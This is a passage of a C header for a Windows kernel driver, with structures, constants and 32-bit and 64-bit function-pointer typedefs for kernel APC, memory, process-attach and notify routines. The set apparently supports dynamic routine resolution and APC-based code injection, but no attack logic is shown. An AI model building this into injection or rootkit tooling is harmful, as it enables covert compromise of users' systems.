166 | CLIENT_ID ClientId;
167 | KPRIORITY Priority;
168 | LONG BasePriority;
169 | ULONG ContextSwitches;
170 | ULONG ThreadState;
171 | ULONG WaitReason;
172 | } SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
173 |
174 | typedef struct _THREAD_BASIC_INFORMATION {
175 | NTSTATUS ExitStatus;
176 | PNT_TIB TebBaseAddress;
177 | CLIENT_ID ClientId;
178 | KAFFINITY AffinityMask;
179 | KPRIORITY Priority;
180 | KPRIORITY BasePriority;
181 | } THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;
182 |
183 | typedef enum _KAPC_ENVIRONMENT {
184 | OriginalApcEnvironment,
185 | AttachedApcEnvironment,
186 | CurrentApcEnvironment,
187 | InsertApcEnvironment
188 | } KAPC_ENVIRONMENT;
189 |
190 | //VOID KeInitializeApc(__out PRKAPC Apc,
191 | // __in PRKTHREAD Thread,
192 | // __in KAPC_ENVIRONMENT Environment,
193 | // __in PKKERNEL_ROUTINE KernelRoutine,
194 | // __in_opt PKRUNDOWN_ROUTINE RundownRoutine,
195 | // __in_opt PKNORMAL_ROUTINE NormalRoutine,
196 | // __in_opt KPROCESSOR_MODE ProcessorMode,
197 | // __in_opt PVOID NormalContext);
198 | //BOOLEAN KeInsertQueueApc(__inout PRKAPC Apc,
199 | // __in_opt PVOID SystemArgument1,
200 | // __in_opt PVOID SystemArgument2,
201 | // __in KPRIORITY Increment);
202 |
203 | #define PAGE_NOACCESS 0x01
204 | #define PAGE_READONLY 0x02
205 | #define PAGE_READWRITE 0x04
206 | #define PAGE_WRITECOPY 0x08
207 | #define PAGE_EXECUTE 0x10
208 | #define PAGE_EXECUTE_READ 0x20
209 | #define PAGE_EXECUTE_READWRITE 0x40
210 | #define PAGE_EXECUTE_WRITECOPY 0x80
211 | #define PAGE_GUARD 0x100
212 | #define PAGE_NOCACHE 0x200
213 | #define PAGE_WRITECOMBINE 0x400
214 | #define MEM_COMMIT 0x1000
215 | #define MEM_RESERVE 0x2000
216 | #define MEM_DECOMMIT 0x4000
217 | #define MEM_RELEASE 0x8000
218 | #define MEM_FREE 0x10000
219 | #define MEM_PRIVATE 0x20000
220 | #define MEM_MAPPED 0x40000
221 | #define MEM_RESET 0x80000
222 | #define MEM_TOP_DOWN 0x100000
223 | #define MEM_WRITE_WATCH 0x200000
224 | #define MEM_PHYSICAL 0x400000
225 | #define MEM_ROTATE 0x800000
226 | #define MEM_LARGE_PAGES 0x20000000
227 | #define MEM_4MB_PAGES 0x80000000
228 | #define SEC_FILE 0x800000
229 | #define SEC_IMAGE 0x1000000
230 | #define SEC_PROTECTED_IMAGE 0x2000000
231 | #define SEC_RESERVE 0x4000000
232 | #define SEC_COMMIT 0x8000000
233 | #define SEC_NOCACHE 0x10000000
234 | #define SEC_WRITECOMBINE 0x40000000
235 | #define SEC_LARGE_PAGES 0x80000000
236 | #define MEM_IMAGE SEC_IMAGE
237 | #define WRITE_WATCH_FLAG_RESET 0x01
238 |
239 | #ifndef _WIN64
240 | NTSTATUS ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, \
241 | PVOID SystemInformation, \
242 | ULONG SystemInformationLength, \
243 | PULONG ReturnLength);
244 | typedef PWCHAR (__stdcall *WCSSTR)(const WCHAR *Str,const WCHAR *SubStr);
245 | typedef VOID (__stdcall *MMUNMAPLOCKEDPAGES)(PVOID BaseAddress,PMDL MemoryDescriptorList);
246 | typedef PVOID (__stdcall *MMMAPLOCKEDPAGES)(PMDL MemoryDescriptorList,KPROCESSOR_MODE AccessMode);
247 | typedef VOID (__stdcall *MMBUILDMDLFORNONPAGEDPOOL)(PMDLX MemoryDescriptorList);
248 | typedef PMDL (__stdcall *MMCREATEMDL)(PMDL MemoryDescriptorList,PVOID Base,SIZE_T Length);
249 | typedef PVOID (__stdcall *PSGETCURRENTPROCESS)(void);
250 | typedef PVOID (__stdcall *KEGETCURRENTTHREAD)(void);
251 | typedef BOOLEAN (__stdcall *KEINSERTQUEUEAPC)(PKAPC Apc,PVOID SystemArg1,PVOID SystemArg2,KPRIORITY Increment);
252 | //typedef VOID (__stdcall *PKKERNEL_ROUTINE)(PKAPC Apc,PVOID *NormalRoutine,PVOID *NormalContext,PVOID *SystemArgument1,PVOID *SystemArgument2);
253 | typedef VOID (__stdcall *KEINITIALIZEAPC)(PKAPC Apc,PETHREAD Thread,PVOID Environment,PVOID KernelRoutine, \
254 | PVOID RundownRoutine,PVOID NormalRoutine,KPROCESSOR_MODE ProcessorMode,PVOID NormalContext);
255 | typedef VOID (__stdcall *KEUNSTACKDETACHPROCESS)(PVOID ApcState);
256 | typedef NTSTATUS (__stdcall *ZWALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle,PVOID *BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);
257 | typedef VOID (__stdcall *KESTACKATTACHPROCESS)(PVOID Process,PVOID ApcState);
258 | typedef PVOID (__stdcall *IOGETCURRENTPROCESS)(void);
259 | typedef NTSTATUS (__stdcall *KEWAITFORSINGLEOBJECT)(PVOID Object,KWAIT_REASON WaitReason,KPROCESSOR_MODE WaitMode,BOOLEAN Alertable,PLARGE_INTEGER Timeout);
260 | typedef VOID (__stdcall *OBDEREFERENCEOBJECT)(PVOID Object);
261 | typedef NTSTATUS (__stdcall *ZWCLOSE)(HANDLE Handle);
262 | typedef NTSTATUS (__stdcall *OBREFERENCEOBJECTBYHANDLE)(HANDLE Handle,ACCESS_MASK DesiredAccess,POBJECT_TYPE ObjectType,KPROCESSOR_MODE AccessMode, \
263 | PVOID *Object,POBJECT_HANDLE_INFORMATION HandleInformation);
264 | typedef NTSTATUS (__stdcall *PSCREATESYSTEMTHREAD)(PHANDLE ThreadHandle,ULONG DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes, \
265 | HANDLE ProcessHandle,PCLIENT_ID ClientId,PKSTART_ROUTINE StartRoutine,PVOID StartContext);
266 | typedef NTSTATUS (__stdcall *PSLOOKUPPROCESSBYPROCESSID)(HANDLE ProcessId,PVOID *Process);
267 | typedef NTSTATUS (__stdcall *PSTERMINATESYSTEMTHREAD)(NTSTATUS ExitStatus);
268 | typedef NTSTATUS (__stdcall *PSSETLOADIMAGENOTIFYROUTINE)(PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
269 | typedef PVOID (__stdcall *EXALLOCATEPOOLWITHTAG)(POOL_TYPE PoolType,SIZE_T NumberOfBytes,ULONG Tag);
270 | typedef NTSTATUS (__stdcall *ZWQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
271 | typedef VOID (__stdcall *EXFREEPOOLWITHTAG)(PVOID P,ULONG Tag);
272 | typedef BOOLEAN (__stdcall *Function_Entry)(PVOID pNtoskrnlBase,EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag);
273 | typedef PUCHAR (__stdcall *PSGETPROCESSIMAGEFILENAME)(PVOID Process);
274 | typedef NTSTATUS (__stdcall *PSREMOVELOADIMAGENOTIFYROUTINE)(PVOID NotifyRoutine);
275 | typedef NTSTATUS (__stdcall *PSSETCREATEPROCESSNOTIFYROUTINE)(PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine,BOOLEAN Remove);
276 | typedef BOOLEAN (__stdcall *PSGETVERSION)(PULONG MajorVersion,PULONG MinorVersion,PULONG BuildNumber,PUNICODE_STRING CSDVersion);
277 | typedef BOOLEAN (__stdcall *MMISADDRESSVALID)(PVOID VirtualAddress);
278 | typedef NTSTATUS (__stdcall *OBOPENOBJECTBYPOINTER)(PVOID Object, \
279 | ULONG HandleAttributes, \
280 | PACCESS_STATE PassedAccessState, \
281 | ACCESS_MASK DesiredAccess, \
282 | POBJECT_TYPE ObjectType, \
283 | KPROCESSOR_MODE AccessMode, \
284 | PHANDLE Handle);
285 | typedef NTSTATUS (__stdcall *ZWQUERYINFORMATIONTHREAD)(HANDLE ThreadHandle, \
286 | THREADINFOCLASS ThreadInformationClass, \
287 | PVOID ThreadInformation, \
288 | ULONG ThreadInformationLength, \
289 | PULONG ReturnLength);
290 |
291 | typedef NTSTATUS (__stdcall *ZWQUERYINFORMATIONPROCESS)(HANDLE ProcessHandle, \
292 | PROCESSINFOCLASS ProcessInformationClass, \
293 | PVOID ProcessInformation, \
294 | ULONG ProcessInformationLength, \
295 | PULONG ReturnLength);
296 | typedef NTSTATUS (__stdcall *PSLOOKUPTHREADBYTHREADID)(HANDLE ThreadId,PETHREAD *Thread);
297 | typedef PEPROCESS (__stdcall *IOTHREADTOPROCESS)(PETHREAD Thread);
298 | typedef PMDL (__stdcall *IOALLOCATEMDL)(PVOID VirtualAddress,ULONG Length,BOOLEAN SecondaryBuffer,BOOLEAN ChargeQuota,PIRP Irp);
299 | typedef VOID (__stdcall *MMPROBEANDLOCKPAGES)(PMDLX MemoryDescriptorList,KPROCESSOR_MODE AccessMode,LOCK_OPERATION Operation);
300 | typedef PVOID (__stdcall *MMMAPLOCKEDPAGESSPECIFYCACHE)(PMDLX MemoryDescriptorList, \
301 | KPROCESSOR_MODE AccessMode, \
302 | MEMORY_CACHING_TYPE CacheType, \
303 | PVOID BaseAddress, \
304 | ULONG BugCheckOnFailure, \
305 | MM_PAGE_PRIORITY Priority);
306 | typedef VOID (__stdcall *MMUNLOCKPAGES)(PMDLX MemoryDescriptorList);
307 | typedef VOID (__stdcall *IOFREEMDL)(PMDL Mdl);
308 | typedef NTSTATUS (__stdcall *KEDELAYEXECUTIONTHREAD)(KPROCESSOR_MODE WaitMode, \
309 | BOOLEAN Alertable, \
310 | PLARGE_INTEGER Interval);
311 | typedef VOID (__stdcall *KEBUGCHECKEX)(ULONG BugCheckCode, \
312 | ULONG_PTR BugCheckParameter1, \
313 | ULONG_PTR BugCheckParameter2, \
314 | ULONG_PTR BugCheckParameter3, \
315 | ULONG_PTR BugCheckParameter4);
316 | typedef VOID (__stdcall *KEQUERYSYSTEMTIME)(PLARGE_INTEGER CurrentTime);
317 | typedef VOID (__stdcall *EXSYSTEMTIMETOLOCALTIME)(PLARGE_INTEGER SystemTime, \
318 | PLARGE_INTEGER LocalTime);
319 | typedef PVOID (__stdcall *MMGETSYSTEMROUTINEADDRESS)(PUNICODE_STRING SystemRoutineName);
320 | typedef VOID (__stdcall *RTLINITUNICODESTRING)(PUNICODE_STRING DestinationString,PCWSTR SourceString);
321 | typedef NTSTATUS (__stdcall *RTLDECOMPRESSBUFFER)(USHORT CompressionFormat, \
322 | PUCHAR UncompressedBuffer, \
323 | ULONG UncompressedBufferSize, \
324 | PUCHAR CompressedBuffer, \
325 | ULONG CompressedBufferSize, \
326 | PULONG FinalUncompressedSize);
327 | #else
328 | NTSTATUS ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, \
329 | PVOID SystemInformation, \
330 | ULONG SystemInformationLength, \
331 | PULONG ReturnLength);
332 | typedef PWCHAR (__fastcall *WCSSTR)(const WCHAR *Str,const WCHAR *SubStr);
333 | typedef VOID (__fastcall *MMUNMAPLOCKEDPAGES)(PVOID BaseAddress,PMDL MemoryDescriptorList);
334 | typedef PVOID (__fastcall *MMMAPLOCKEDPAGES)(PMDL MemoryDescriptorList,KPROCESSOR_MODE AccessMode);
335 | typedef VOID (__fastcall *MMBUILDMDLFORNONPAGEDPOOL)(PMDLX MemoryDescriptorList);
336 | typedef PMDL (__fastcall *MMCREATEMDL)(PMDL MemoryDescriptorList,PVOID Base,SIZE_T Length);
337 | typedef PVOID (__fastcall *PSGETCURRENTPROCESS)(void);
338 | typedef PVOID (__fastcall *KEGETCURRENTTHREAD)(void);
339 | typedef BOOLEAN (__fastcall *KEINSERTQUEUEAPC)(PKAPC Apc,PVOID SystemArg1,PVOID SystemArg2,KPRIORITY Increment);
340 | //typedef VOID (__fastcall *PKKERNEL_ROUTINE)(PVOID Apc,PVOID *NormalRoutine,PVOID *NormalContext,PVOID *SystemArgument1,PVOID *SystemArgument2);
341 | typedef VOID (__fastcall *KEINITIALIZEAPC)(PKAPC Apc,PETHREAD Thread,PVOID Environment,PVOID KernelRoutine, \
342 | PVOID RundownRoutine,PVOID NormalRoutine,KPROCESSOR_MODE ProcessorMode,PVOID NormalContext);
343 | typedef VOID (__fastcall *KEUNSTACKDETACHPROCESS)(PVOID ApcState);
344 | typedef NTSTATUS (__fastcall *ZWALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle,PVOID *BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);
345 | typedef VOID (__fastcall *KESTACKATTACHPROCESS)(PVOID Process,PVOID ApcState);
346 | typedef PVOID (__fastcall *IOGETCURRENTPROCESS)(void);
347 | typedef NTSTATUS (__fastcall *KEWAITFORSINGLEOBJECT)(PVOID Object,KWAIT_REASON WaitReason,KPROCESSOR_MODE WaitMode,BOOLEAN Alertable,PLARGE_INTEGER Timeout);
348 | typedef VOID (__fastcall *OBDEREFERENCEOBJECT)(PVOID Object);
349 | typedef NTSTATUS (__fastcall *ZWCLOSE)(HANDLE Handle);
350 | typedef NTSTATUS (__fastcall *OBREFERENCEOBJECTBYHANDLE)(HANDLE Handle,ACCESS_MASK DesiredAccess,POBJECT_TYPE ObjectType,KPROCESSOR_MODE AccessMode, \
351 | PVOID *Object,POBJECT_HANDLE_INFORMATION HandleInformation);
352 | typedef NTSTATUS (__fastcall *PSCREATESYSTEMTHREAD)(PHANDLE ThreadHandle,ULONG DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes, \
353 | HANDLE ProcessHandle,PCLIENT_ID ClientId,PKSTART_ROUTINE StartRoutine,PVOID StartContext);
354 | typedef NTSTATUS (__fastcall *PSLOOKUPPROCESSBYPROCESSID)(HANDLE ProcessId,PVOID *Process);
355 | typedef NTSTATUS (__fastcall *PSTERMINATESYSTEMTHREAD)(NTSTATUS ExitStatus);
356 | typedef NTSTATUS (__fastcall *PSSETLOADIMAGENOTIFYROUTINE)(PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
357 | typedef PVOID (__fastcall *EXALLOCATEPOOLWITHTAG)(POOL_TYPE PoolType,SIZE_T NumberOfBytes,ULONG Tag);
358 | typedef NTSTATUS (__fastcall *ZWQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
359 | typedef VOID (__fastcall *EXFREEPOOLWITHTAG)(PVOID P,ULONG Tag);
360 | typedef BOOLEAN (__fastcall *Function_Entry)(PVOID pNtoskrnlBase,EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag);
361 | typedef PUCHAR (__fastcall *PSGETPROCESSIMAGEFILENAME)(PVOID Process);
362 | typedef NTSTATUS (__fastcall *PSREMOVELOADIMAGENOTIFYROUTINE)(PVOID NotifyRoutine);
363 | typedef NTSTATUS (__fastcall *PSSETCREATEPROCESSNOTIFYROUTINE)(PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine,BOOLEAN Remove);
364 | typedef BOOLEAN (__fastcall *PSGETVERSION)(PULONG MajorVersion,PULONG MinorVersion,PULONG BuildNumber,PUNICODE_STRING CSDVersion);
365 | typedef BOOLEAN (__fastcall *MMISADDRESSVALID)(PVOID VirtualAddress);
366 | typedef NTSTATUS (__fastcall *OBOPENOBJECTBYPOINTER)(PVOID Object, \
367 | ULONG HandleAttributes, \
368 | PACCESS_STATE PassedAccessState, \
369 | ACCESS_MASK DesiredAccess, \
370 | POBJECT_TYPE ObjectType, \
371 | KPROCESSOR_MODE AccessMode, \
372 | PHANDLE Handle);
373 | typedef NTSTATUS (__fastcall *ZWQUERYINFORMATIONTHREAD)(HANDLE ThreadHandle, \
374 | THREADINFOCLASS ThreadInformationClass, \
375 | PVOID ThreadInformation, \
376 | ULONG ThreadInformationLength, \
377 | PULONG ReturnLength);
378 |
379 | typedef NTSTATUS (__fastcall *ZWQUERYINFORMATIONPROCESS)(HANDLE ProcessHandle, \
380 | PROCESSINFOCLASS ProcessInformationClass, \
381 | PVOID ProcessInformation, \
382 | ULONG ProcessInformationLength, \
383 | PULONG ReturnLength);
384 | typedef NTSTATUS (__fastcall *PSLOOKUPTHREADBYTHREADID)(HANDLE ThreadId,PETHREAD *Thread);
385 | typedef PEPROCESS (__fastcall *IOTHREADTOPROCESS)(PETHREAD Thread);
386 | typedef PMDL (__fastcall *IOALLOCATEMDL)(PVOID VirtualAddress,ULONG Length,BOOLEAN SecondaryBuffer,BOOLEAN ChargeQuota,PIRP Irp);
387 | typedef VOID (__fastcall *MMPROBEANDLOCKPAGES)(PMDLX MemoryDescriptorList,KPROCESSOR_MODE AccessMode,LOCK_OPERATION Operation);
388 | typedef PVOID (__fastcall *MMMAPLOCKEDPAGESSPECIFYCACHE)(PMDLX MemoryDescriptorList, \
389 | KPROCESSOR_MODE AccessMode, \
390 | MEMORY_CACHING_TYPE CacheType, \
391 | PVOID BaseAddress, \
392 | ULONG BugCheckOnFailure, \
393 | MM_PAGE_PRIORITY Priority);
394 | typedef VOID (__fastcall *MMUNLOCKPAGES)(PMDLX MemoryDescriptorList);
395 | typedef VOID (__fastcall *IOFREEMDL)(PMDL Mdl);
396 | typedef NTSTATUS (__fastcall *KEDELAYEXECUTIONTHREAD)(KPROCESSOR_MODE WaitMode,BOOLEAN Alertable,PLARGE_INTEGER Interval);
397 | typedef VOID (__fastcall *KEBUGCHECKEX)(ULONG BugCheckCode, \
398 | ULONG_PTR BugCheckParameter1, \
399 | ULONG_PTR BugCheckParameter2, \
400 | ULONG_PTR BugCheckParameter3, \
401 | ULONG_PTR BugCheckParameter4);
402 | typedef VOID (__fastcall *EXSYSTEMTIMETOLOCALTIME)(PLARGE_INTEGER SystemTime, \
403 | PLARGE_INTEGER LocalTime);
404 | typedef PVOID (__fastcall *MMGETSYSTEMROUTINEADDRESS)(PUNICODE_STRING SystemRoutineName);
405 | typedef VOID (__fastcall *RTLINITUNICODESTRING)(PUNICODE_STRING DestinationString,PCWSTR SourceString);
406 | typedef NTSTATUS (__fastcall *RTLDECOMPRESSBUFFER)(USHORT CompressionFormat, \
407 | PUCHAR UncompressedBuffer, \
408 | ULONG UncompressedBufferSize, \
409 | PUCHAR CompressedBuffer, \
410 | ULONG CompressedBufferSize, \
411 | PULONG FinalUncompressedSize);
412 | #endif
413 |
414 |
415 | #endif
--------------------------------------------------------------------------------